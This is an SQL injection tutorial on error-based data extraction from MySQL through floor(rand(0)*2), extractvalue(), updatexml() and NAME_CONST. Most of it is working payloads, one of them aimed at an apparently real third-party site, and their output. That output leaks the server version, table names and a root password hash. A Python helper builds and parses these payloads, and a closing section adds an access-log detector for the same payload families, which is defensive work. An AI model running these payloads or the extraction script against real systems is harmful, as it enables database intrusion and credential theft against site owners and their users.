1. Errors via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

Why this errors: GROUP BY is evaluated through a temporary table keyed on the concatenated value. rand(0) is a seeded, deterministic sequence, and floor(rand(0)*2) is computed once when the key is looked up and again when the row is inserted, so by the third row the key being inserted already exists and MySQL raises "Duplicate entry" with the leaked value inside the key. The FROM clause therefore needs at least three rows (information_schema.tables, or the three-row UNION of the second form, guarantees that), and an unseeded rand() is not reliable.

Example:
Start with a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version has been leaked; the trailing 1 is the floor(rand(0)*2) value appended by concat(), not part of the version string. To read other data, replace version() with the expression you want to leak.
For example, to read the admin username and password:

Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

In both cases the password is admin888; the final 1 is again the floor() digit.

2. ExtractValue
Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'

Two caveats for the XML functions: the marker byte (0x5c or 0x3a above, 0x7e is the usual choice) is what makes the second argument invalid XPath, and a bare value that happens to be valid XPath would not raise the error; and the XPATH error echoes at most 32 characters, marker included, so longer values have to be read in substr() windows.
More collected examples (NAME_CONST duplicate column name):

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Here NAME_CONST() names its output column after the leaked value. Joining two derived tables that both expose that column and then selecting * from the join makes MySQL raise ERROR 1060 (42S21) "Duplicate column name", with the value in the message.
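The following Python script is an added example, not code from the original post or from any tool it mentions. It builds the floor(), extractvalue()/updatexml() and NAME_CONST payloads from sections 1 to 3 and the collected examples, parses the leaked value back out of each MySQL error message, and pages a long value through the 32-character XPATH error window. The target is a constructed local stand-in (fake_oracle) that reproduces the MySQL error text for the sample mysql.user hash quoted above; swapping it for a function that sends the payload to an injectable parameter and returns the response body is the only change needed for a real test.

```python
import re

# Error-message shapes taken from the post's output. Newer MySQL names the
# GROUP BY temporary key '<group_key>' instead of 'group_key'; both are accepted.
DUP_ENTRY_RE = re.compile(r"Duplicate entry '(.*?)' for key '<?group_key>?'")
XPATH_ERR_RE = re.compile(r"XPATH syntax error: '(.*?)'")
DUP_COLUMN_RE = re.compile(r"Duplicate column name '(.*?)'")

XPATH_WIDTH = 31   # the XPATH error shows 32 chars; one of them is the marker byte


def floor_payload(expr):
    """floor(rand(0)*2) duplicate-key payload leaking the SQL expression `expr`.
    The FROM table must have at least 3 rows; information_schema.tables always does."""
    return ("and (select 1 from (select count(*),concat((%s),floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)" % expr)


def xpath_payload(expr, func="extractvalue", offset=1, width=XPATH_WIDTH):
    """extractvalue()/updatexml() payload for one substr() window of `expr`.
    0x7e ('~') is never valid XPath, so the expression always errors out."""
    window = "substr((%s),%d,%d)" % (expr, offset, width)
    if func == "updatexml":
        return "and 1=(updatexml(1,concat(0x7e,%s),1))" % window
    return "and extractvalue(1,concat(0x7e,%s))" % window


def name_const_payload(expr):
    """NAME_CONST duplicate-column payload, the form used in the collected examples."""
    nc = "name_const((%s),0)" % expr
    return "and exists(select*from (select*from(select %s)a join (select %s)b)c)" % (nc, nc)


def parse_floor(err):
    """'Duplicate entry 'VALUE1' ...' -> VALUE; the trailing digit is floor(rand(0)*2)."""
    m = DUP_ENTRY_RE.search(err)
    return m.group(1)[:-1] if m else None


def parse_xpath(err):
    """'XPATH syntax error: 'MVALUE'' -> VALUE, where M is the single marker byte."""
    m = XPATH_ERR_RE.search(err)
    return m.group(1)[1:] if m else None


def parse_name_const(err):
    """'Duplicate column name 'VALUE'' -> VALUE."""
    m = DUP_COLUMN_RE.search(err)
    return m.group(1) if m else None


def extract_long(oracle, expr, func="extractvalue", width=XPATH_WIDTH):
    """Page substr() windows through the 32-char XPATH error until the value is exhausted.
    `oracle(payload)` must return the error text the target echoes for that payload."""
    value, offset = "", 1
    while True:
        chunk = parse_xpath(oracle(xpath_payload(expr, func, offset, width)))
        if not chunk:            # None: no error echoed; '': substr() ran past the end
            break
        value += chunk
        if len(chunk) < width:   # a short window means we reached the end of the value
            break
        offset += width
    return value


# --- constructed stand-in for the vulnerable page, so the script runs offline ---
# SECRET is the sample mysql.user hash shown in the post. A real oracle would send
# the payload to the injectable parameter and return the response body instead.
SECRET = "*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82"
_WINDOW_RE = re.compile(r"substr\(\(.*\),(\d+),(\d+)\)")


def fake_oracle(payload):
    m = _WINDOW_RE.search(payload)
    if not m:
        return "ERROR 1105 (HY000): XPATH syntax error: '~'"
    offset, width = int(m.group(1)), int(m.group(2))
    return "ERROR 1105 (HY000): XPATH syntax error: '~%s'" % SECRET[offset - 1:offset - 1 + width]


if __name__ == "__main__":
    print(parse_floor("ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"))
    print(parse_xpath("ERROR 1105 (HY000): XPATH syntax error: '\\admin888'"))
    print(extract_long(fake_oracle, "select password from mysql.user limit 0,1"))
```

extract_long() stops either on a window shorter than 31 characters or on an empty window, so values whose length is an exact multiple of the window size cost one extra request rather than an infinite loop.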
Error-based injection on newer MySQL versions: using NAME_CONST

It's been a while since I've made an SQL injection tutorial, so I thought I should make a new one using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to write a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that. Later releases also enforce that both arguments are constants: a subquery or function call in the name position is rejected with ERROR 1210 (HY000): Incorrect arguments to NAME_CONST instead of leaking anything, which is why the method below works on some 5.0.x servers and not on others.
Code:
NAME_CONST(name, value)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = your MySQL variable. Two NAME_CONST() columns with the same name inside one derived table make the outer select+* fail with "Duplicate column name", and that name is the leaked value.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

DATA is the body of the subquery whose first row you want to read (column+from+table); the same subquery appears twice so that both columns get the same name.

We should get a duplicate column name '1' error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the table names out.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

Writing the table name as a hex literal (0x...) keeps quotes out of the payload: 0x6d7973716c is 'mysql' and 0x75736572 is 'user'. Change limit+0,1 to limit+1,1, limit+2,1 and so on to walk through the remaining rows.

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

0x207e20 is the separator ' ~ ' that concat_ws() places between the two columns.

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
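On the defensive side, here is an added example (not part of the original post) that flags all four payload families from this page in web-server access logs: the floor(rand(0)*2) duplicate key, extractvalue(), updatexml() and NAME_CONST. The log lines are constructed samples using documentation-range addresses and the post's own payloads against its detail.php path; the status column is 200 throughout because the application prints the database error into an otherwise normal page, which is why status-code alerting alone misses this class of injection.

```python
import re
from urllib.parse import unquote_plus

# One regex per error-based family discussed in the post. Case-insensitive and
# whitespace-tolerant because MySQL accepts both; matching runs on decoded text.
SIGNATURES = {
    "floor_dupkey": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml":    re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const":   re.compile(r"\bname_const\s*\(", re.I),
}

# Combined-format request line: client, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) ')


def decode_twice(s):
    """Decode URL encoding twice: scanners often double-encode, and '+' means space."""
    return unquote_plus(unquote_plus(s))


def classify(path):
    """Return the payload families present in one request path (empty list if clean)."""
    decoded = decode_twice(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan(lines):
    """Return (client, timestamp, families, status) for every flagged access-log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, path, status = m.groups()
        families = classify(path)
        if families:
            hits.append((client, ts, families, status))
    return hits


def by_client(hits):
    """Aggregate which families each source address tried; handy for triage."""
    agg = {}
    for client, _, families, _ in hits:
        agg.setdefault(client, set()).update(families)
    return {c: sorted(f) for c, f in agg.items()}


# Constructed sample log lines (documentation-range addresses, payloads from the post).
# All return 200 because the application prints the MySQL error into a normal page.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2009:13:55:36 +0800] "GET /qcwh/content/detail.php?id=330%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 1043',
    '203.0.113.7 - - [10/Oct/2009:13:55:40 +0800] "GET /qcwh/content/detail.php?id=330%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 200 987',
    '203.0.113.9 - - [10/Oct/2009:13:56:01 +0800] "GET /qcwh/content/detail.php?id=330+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 200 990',
    '198.51.100.4 - - [10/Oct/2009:13:57:12 +0800] "GET /qcwh/content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 200 1001',
    '198.51.100.4 - - [10/Oct/2009:13:58:00 +0800] "GET /qcwh/content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(by_client(scan(SAMPLE_LOG)))
```

Matching on the decoded path rather than the raw log line is what catches the double-encoded variants; the signatures deliberately key on the function names and the rand(0)*2 idiom rather than on SQL keywords like select, which appear in plenty of legitimate traffic.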